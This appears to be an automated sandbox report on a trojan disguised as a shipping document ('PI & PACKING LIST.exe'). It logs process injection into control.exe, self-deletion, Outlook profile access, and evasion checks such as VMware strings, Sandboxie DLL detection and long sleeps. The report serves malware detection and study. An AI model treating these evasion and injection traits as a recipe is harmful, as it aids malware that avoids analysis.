Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012799A0 NtCreateSection,LdrInitializeThunk, 2_2_012799A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01279860
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279840 NtDelayExecution,LdrInitializeThunk, 2_2_01279840
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012798F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_012798F0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A20 NtResumeThread,LdrInitializeThunk, 2_2_01279A20
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01279A00
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A50 NtCreateFile,LdrInitializeThunk, 2_2_01279A50
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279540 NtReadFile,LdrInitializeThunk, 2_2_01279540
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012795D0 NtClose,LdrInitializeThunk, 2_2_012795D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01279710
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012797A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_012797A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01279780
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01279FE0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01279660
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012796E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_012796E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279950 NtQueueApcThread, 2_2_01279950
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012799D0 NtCreateProcessEx, 2_2_012799D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279820 NtEnumerateKey, 2_2_01279820
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127B040 NtSuspendThread, 2_2_0127B040
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012798A0 NtWriteVirtualMemory, 2_2_012798A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279B00 NtSetValueKey, 2_2_01279B00
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A3B0 NtGetContextThread, 2_2_0127A3B0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A10 NtQuerySection, 2_2_01279A10
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279A80 NtOpenDirectoryObject, 2_2_01279A80
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279520 NtWaitForSingleObject, 2_2_01279520
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127AD30 NtSetContextThread, 2_2_0127AD30
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279560 NtWriteFile, 2_2_01279560
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012795F0 NtQueryInformationFile, 2_2_012795F0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279730 NtQueryVirtualMemory, 2_2_01279730
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A710 NtOpenProcessToken, 2_2_0127A710
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279760 NtOpenProcess, 2_2_01279760
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127A770 NtOpenThread, 2_2_0127A770
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279770 NtSetInformationFile, 2_2_01279770
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279610 NtEnumerateValueKey, 2_2_01279610
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279670 NtQueryInformationProcess, 2_2_01279670
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279650 NtQueryValueKey, 2_2_01279650
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012796D0 NtCreateKey, 2_2_012796D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E007 NtClose, 2_2_0041E007
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E0B7 NtAllocateVirtualMemory, 2_2_0041E0B7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004012AA NtProtectVirtualMemory, 2_2_004012AA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DED7 NtCreateFile, 2_2_0041DED7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DF87 NtReadFile, 2_2_0041DF87
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E001 NtClose, 2_2_0041E001
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041E0B3 NtAllocateVirtualMemory, 2_2_0041E0B3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004014E9 NtProtectVirtualMemory, 2_2_004014E9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DE93 NtCreateFile, 2_2_0041DE93
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041DF81 NtReadFile, 2_2_0041DF81
Sample file is different than original file name gathered from version info
Source: PI & PACKING LIST.exe, 00000000.00000002.279173554.0000000006E90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000000.00000000.240444204.00000000001CE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000002.00000002.355397019.000000000132F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000002.00000003.259681724.0000000000FF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe, 00000002.00000003.261884863.0000000001191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe Binary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PI & PACKING LIST.exe ReversingLabs: Detection: 76%
Source: PI & PACKING LIST.exe Virustotal: Detection: 57%
Source: PI & PACKING LIST.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI & PACKING LIST.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\71M40-2OQ Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/2@6/5
Source: PI & PACKING LIST.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: PI & PACKING LIST.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PI & PACKING LIST.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: PI & PACKING LIST.exe, Othello/MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.PI & PACKING LIST.exe.d0000.0.unpack, Othello/MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E4539 push esi; ret 0_2_083E453A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E71E0 push eax; ret 0_2_083E73DA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E3206 push ebx; iretd 0_2_083E3207
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0128D0D1 push ecx; ret 2_2_0128D0E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040A0C9 push 7C55F36Ch; retf 2_2_0040A0D3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004210CC push eax; ret 2_2_0042111F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041A0DE pushfd ; iretd 2_2_0041A0EF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041B08A push CBA396CFh; ret 2_2_0041B093
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421119 push eax; ret 2_2_0042111F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421122 push eax; ret 2_2_00421189
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421183 push eax; ret 2_2_00421189
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040A1B8 push 0845B845h; iretd 2_2_0040A1BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004054C4 push edx; ret 2_2_004054C7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00419E80 push ebx; retf 2_2_00419E81
Source: initial sample Static PE information: section name: .text entropy: 7.603845618377083

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\pi & packing list.exe Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PI & PACKING LIST.exe PID: 6140, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 5128 Thread sleep time: -42186s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01305BA5 rdtsc 2_2_01305BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe API coverage: 6.1 %
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread delayed: delay time: 42186 Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: control.exe, 0000000D.00000002.510454015.00000000010D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.281178206.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.267722463.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01305BA5 rdtsc 2_2_01305BA5
Enables debug privileges
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov ecx, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126513A mov eax, dword ptr fs:[00000030h] 2_2_0126513A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126513A mov eax, dword ptr fs:[00000030h] 2_2_0126513A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h] 2_2_01239100
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h] 2_2_01239100
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h] 2_2_01239100
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123C962 mov eax, dword ptr fs:[00000030h] 2_2_0123C962
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h] 2_2_0123B171
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h] 2_2_0123B171
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h] 2_2_0125B944
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h] 2_2_0125B944
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h] 2_2_012661A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h] 2_2_012661A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B69A6 mov eax, dword ptr fs:[00000030h] 2_2_012B69A6
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A185 mov eax, dword ptr fs:[00000030h] 2_2_0126A185
